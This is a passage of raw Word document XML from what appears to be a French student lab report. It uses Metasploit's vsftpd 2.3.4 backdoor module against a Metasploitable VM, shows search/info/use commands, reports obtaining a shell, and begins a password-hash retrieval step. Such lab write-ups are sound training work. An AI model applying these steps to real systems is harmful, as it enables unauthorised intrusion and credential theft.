    <w:p w14:paraId="5F63AB93" w14:textId="3A6C88FF" w:rsidR="00A45B35" w:rsidRDefault="00A45B35" w:rsidP="00A45B35">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36657CA4" w14:textId="77777777" w:rsidR="00A45B35" w:rsidRDefault="00A45B35" w:rsidP="00D6524A"/>
    <w:p w14:paraId="2AD61E4A" w14:textId="77777777" w:rsidR="00A45B35" w:rsidRDefault="00A45B35" w:rsidP="00D6524A"/>
    <w:p w14:paraId="39ACB700" w14:textId="240C5E80" w:rsidR="00A40937" w:rsidRDefault="00FB246A" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00FB246A">
        <w:t>Quelle commande de recherche allez-vous saisir dans la console de Metasploit pour savoir si un (ou plusieurs) exploits sont disponibles pour exploiter ce service ftp en particulier</w:t>
      </w:r>
      <w:r w:rsidR="00A40937">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5B78F" w14:textId="77777777" w:rsidR="00A40937" w:rsidRDefault="00A40937" w:rsidP="00D6524A"/>
    <w:p w14:paraId="2FB45F48" w14:textId="08D2A669" w:rsidR="00A40937" w:rsidRDefault="00A40937" w:rsidP="00D6524A">
      <w:r>
        <w:t xml:space="preserve">Pour cela, on va utiliser la commande : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F94204" w14:textId="77777777" w:rsidR="00A40937" w:rsidRDefault="00A40937" w:rsidP="00D6524A"/>
    <w:p w14:paraId="7A5E3B3E" w14:textId="052480C2" w:rsidR="00A40937" w:rsidRDefault="00A40937" w:rsidP="00A40937">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vsftpd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0142419D" w14:textId="77777777" w:rsidR="00A40937" w:rsidRDefault="00A40937" w:rsidP="00A40937">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DB7A175" w14:textId="77777777" w:rsidR="00A40937" w:rsidRDefault="00A40937" w:rsidP="00A40937">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00A40937">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="026351BA" wp14:editId="09F84C96">
            <wp:extent cx="5760720" cy="1440180"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="692860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0103" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="1440180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="265D4EFD" w14:textId="1757F961" w:rsidR="00A40937" w:rsidRDefault="00A40937" w:rsidP="00A40937">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="783625BA" w14:textId="77777777" w:rsidR="00A45B35" w:rsidRDefault="00A45B35" w:rsidP="00D6524A"/>
    <w:p w14:paraId="7EBE2705" w14:textId="77777777" w:rsidR="00A45B35" w:rsidRDefault="00A45B35" w:rsidP="00D6524A"/>
    <w:p w14:paraId="30A23030" w14:textId="77777777" w:rsidR="00CF7AF2" w:rsidRDefault="00CF7AF2" w:rsidP="00D6524A">
      <w:r w:rsidRPr="00CF7AF2">
        <w:t>Comment obtenir plus d'information sur cet exploit dans la console msf ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106FA476" w14:textId="77777777" w:rsidR="009F075E" w:rsidRDefault="009F075E" w:rsidP="00D6524A"/>
    <w:p w14:paraId="4E3AA390" w14:textId="540E75E8" w:rsidR="00CF7AF2" w:rsidRDefault="00CF7AF2" w:rsidP="00D6524A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Pour obtenir plus d’informations sur cet exploit dans la console msf </w:t>
      </w:r>
      <w:r w:rsidR="009F075E">
        <w:t>on peut</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> utiliser la commande suivante :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565952C3" w14:textId="77777777" w:rsidR="00562311" w:rsidRDefault="00562311" w:rsidP="00D6524A"/>
    <w:p w14:paraId="3C1A5EFC" w14:textId="25E65F30" w:rsidR="0002523A" w:rsidRPr="00434909" w:rsidRDefault="0002523A" w:rsidP="0002523A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00434909">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>info exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DE749B" w14:textId="77777777" w:rsidR="0002523A" w:rsidRPr="00434909" w:rsidRDefault="0002523A" w:rsidP="0002523A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EE4633" w14:textId="77777777" w:rsidR="0002523A" w:rsidRDefault="0002523A" w:rsidP="0002523A">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="0002523A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78CD994E" wp14:editId="25201968">
            <wp:extent cx="5760720" cy="3806190"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="3845009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00935" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3806190"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07FF8D" w14:textId="35BF1A55" w:rsidR="0002523A" w:rsidRDefault="0002523A" w:rsidP="0002523A">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E133AB">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DBAC23" w14:textId="77777777" w:rsidR="00434909" w:rsidRDefault="0054204D" w:rsidP="0054204D">
      <w:r w:rsidRPr="0054204D">
        <w:t xml:space="preserve">Notez dans la section </w:t>
      </w:r>
      <w:r w:rsidRPr="0054204D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Basic options</w:t>
      </w:r>
      <w:r w:rsidRPr="0054204D">
        <w:t xml:space="preserve"> quelles sont les variables que vous devrez configurer ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A8B840" w14:textId="77777777" w:rsidR="000C633D" w:rsidRDefault="000C633D" w:rsidP="0054204D"/>
    <w:p w14:paraId="50BE3B01" w14:textId="2704DF2C" w:rsidR="000C633D" w:rsidRDefault="000C633D" w:rsidP="0054204D">
      <w:r>
        <w:t>On</w:t>
      </w:r>
      <w:r w:rsidR="00E133AB">
        <w:t xml:space="preserve"> peut voir que l’on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> doit configurer RSHOST et RPORT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696DF0BB" w14:textId="77777777" w:rsidR="00434909" w:rsidRDefault="00434909" w:rsidP="0054204D"/>
    <w:p w14:paraId="061AE467" w14:textId="77777777" w:rsidR="00434909" w:rsidRDefault="00434909" w:rsidP="00434909">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00434909">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F3CA438" wp14:editId="2474BDA8">
            <wp:extent cx="3975100" cy="1511300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16216285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28565" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3975100" cy="1511300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEDBC97" w14:textId="5170C942" w:rsidR="00C51107" w:rsidRDefault="00434909" w:rsidP="00C51107">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D40952" w14:textId="5F0571DB" w:rsidR="003E53FE" w:rsidRPr="00C51107" w:rsidRDefault="00F90DE9" w:rsidP="00C51107">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00F90DE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PARENTHESE</w:t>
      </w:r>
      <w:r w:rsidR="00C51107">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E9196" w14:textId="77777777" w:rsidR="00F90DE9" w:rsidRDefault="00F90DE9" w:rsidP="0054204D"/>
    <w:p w14:paraId="4241AF43" w14:textId="526EAA0B" w:rsidR="006C231D" w:rsidRDefault="006B665F" w:rsidP="00C812F4">
      <w:r>
        <w:t>Pour pouvoir utiliser cette vulnérabilité, nous devons installer la version de vsftpd qui est infectée</w:t>
      </w:r>
      <w:r w:rsidR="00C812F4">
        <w:t>, pour cela on peut directement installer une VM qui se nomme Metasploitable qui permet d’avoir toutes les versions des programmes vulnérables pour pouvoir tester les fonctionnalités.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0B559" w14:textId="77777777" w:rsidR="00C812F4" w:rsidRDefault="00C812F4" w:rsidP="00C812F4"/>
    <w:p w14:paraId="2F3A5424" w14:textId="54ECB03C" w:rsidR="00C812F4" w:rsidRPr="00C51107" w:rsidRDefault="00C812F4" w:rsidP="00C812F4">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">FIN </w:t>
      </w:r>
      <w:r w:rsidRPr="00F90DE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PARENTHESE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B643B0D" w14:textId="77777777" w:rsidR="00C812F4" w:rsidRDefault="00C812F4" w:rsidP="00C812F4"/>
    <w:p w14:paraId="59A7B54A" w14:textId="77777777" w:rsidR="00C812F4" w:rsidRDefault="00C812F4" w:rsidP="00C812F4"/>
    <w:p w14:paraId="4518A638" w14:textId="77777777" w:rsidR="00C812F4" w:rsidRDefault="00C812F4" w:rsidP="00C812F4"/>
    <w:p w14:paraId="20AD7C75" w14:textId="77777777" w:rsidR="006C231D" w:rsidRDefault="006C231D" w:rsidP="006C231D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3624B227" w14:textId="643043B8" w:rsidR="006C231D" w:rsidRDefault="003D7082" w:rsidP="006C231D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Pour connaître le niveau de privilèges, on utilise la commande :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416D9FEB" w14:textId="4CB6C29A" w:rsidR="003D7082" w:rsidRDefault="003D7082" w:rsidP="003D7082">
      <w:pPr>
        <w:pStyle w:val="Sansinterligne"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Id</w:t>
      </w:r>
      <w:r w:rsidR="009F7C46">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> | groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D686F58" w14:textId="77777777" w:rsidR="003D7082" w:rsidRDefault="003D7082" w:rsidP="003D7082">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23DD97E1" w14:textId="77777777" w:rsidR="003D7082" w:rsidRDefault="003D7082" w:rsidP="003D7082">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E3864E1" w14:textId="157C4DF8" w:rsidR="003D7082" w:rsidRDefault="00F90DE9" w:rsidP="003D7082">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F90DE9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Sélectionnez l'exploit avec la commande use. L'invite de la ligne de commande </w:t>
      </w:r>
      <w:r w:rsidR="007517E3" w:rsidRPr="00F90DE9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>a-t</w:t>
      </w:r>
      <w:r w:rsidRPr="00F90DE9">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>-il changé ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B373CEC" w14:textId="77777777" w:rsidR="007517E3" w:rsidRDefault="007517E3" w:rsidP="003D7082">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF6B949" w14:textId="277391A2" w:rsidR="00A73AD0" w:rsidRDefault="00A73AD0" w:rsidP="003D7082">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>Oui, l’invite de commandes a changé</w:t>
      </w:r>
      <w:r w:rsidR="007517E3">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t>, nous avons le nom de l’exploit que nous utilisons en rouge :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C0FA9E" w14:textId="77777777" w:rsidR="00F90DE9" w:rsidRDefault="00F90DE9" w:rsidP="003D7082">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F05B460" w14:textId="7DD57FCD" w:rsidR="00A73AD0" w:rsidRDefault="00A73AD0" w:rsidP="001144B0">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00A73AD0">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0294D7C8" wp14:editId="03E61E4D">
            <wp:extent cx="5943886" cy="883228"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="47474145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41455" name="Image 1" descr="Une image contenant texte, capture d’écran, Police&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6069330" cy="901868"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A891A4" w14:textId="033F6B20" w:rsidR="00E62DE8" w:rsidRDefault="00A73AD0" w:rsidP="007517E3">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5BED40" w14:textId="37F64721" w:rsidR="00A73AD0" w:rsidRDefault="00B83A62" w:rsidP="00A73AD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Le backdoor est bien activé : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3FE8EC" w14:textId="77777777" w:rsidR="00B83A62" w:rsidRDefault="00B83A62" w:rsidP="00A73AD0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1CE433" w14:textId="77777777" w:rsidR="00B83A62" w:rsidRDefault="00B83A62" w:rsidP="001144B0">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00B83A62">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D54F744" wp14:editId="01EFA5A7">
            <wp:extent cx="5760720" cy="3195320"/>
            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
            <wp:docPr id="188150821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8215" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3195320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="503D984F" w14:textId="17520A3E" w:rsidR="00B83A62" w:rsidRDefault="00B83A62" w:rsidP="00B83A62">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>18</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D565280" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="36125E3D" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="00F1CED4" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="78CBA6E2" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="75D3F8DE" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="2555F258" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="3A3560E9" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="094F193D" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="4FA2EFD8" w14:textId="77777777" w:rsidR="001D51FE" w:rsidRPr="001D51FE" w:rsidRDefault="001D51FE" w:rsidP="001D51FE"/>
    <w:p w14:paraId="29C21EC1" w14:textId="18B068C9" w:rsidR="00AD3252" w:rsidRDefault="00AD3252" w:rsidP="00FE5DA9">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc197957012"/>
      <w:r>
        <w:t>Nous avons bien un shell maintenant à disposition</w:t>
      </w:r>
      <w:r w:rsidR="00CF6F33">
        <w:t>, ce qui indique une énorme compromission</w:t>
      </w:r>
      <w:r>
        <w:t> :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="62DC160D" w14:textId="77777777" w:rsidR="00CF6F33" w:rsidRPr="00AD3252" w:rsidRDefault="00CF6F33" w:rsidP="00AD3252"/>
    <w:p w14:paraId="6E71ACB3" w14:textId="77777777" w:rsidR="00CF6F33" w:rsidRDefault="00AD3252" w:rsidP="00CF6F33">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00AD3252">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19D90D28" wp14:editId="4A0D3E3B">
            <wp:extent cx="5760720" cy="3526155"/>
            <wp:effectExtent l="0" t="0" r="5080" b="4445"/>
            <wp:docPr id="240586759"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86759" name="Image 1" descr="Une image contenant texte, capture d’écran&#10;&#10;Description générée automatiquement"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3526155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C168EAB" w14:textId="4B0234BE" w:rsidR="00B83A62" w:rsidRDefault="00CF6F33" w:rsidP="00CF6F33">
      <w:pPr>
        <w:pStyle w:val="Lgende"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="004A490F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B058EF" w14:textId="1CF0FF4D" w:rsidR="00B83A62" w:rsidRDefault="00FE5DA9" w:rsidP="00FE5DA9">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc197957013"/>
      <w:r>
        <w:t>Récupération de la version hachée des mots de passes :</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C25F2" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="00FE5DA9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E14A1AF" w14:textId="77777777" w:rsidR="00FE5DA9" w:rsidRDefault="00FE5DA9" w:rsidP="00FE5DA9">
      <w:pPr>
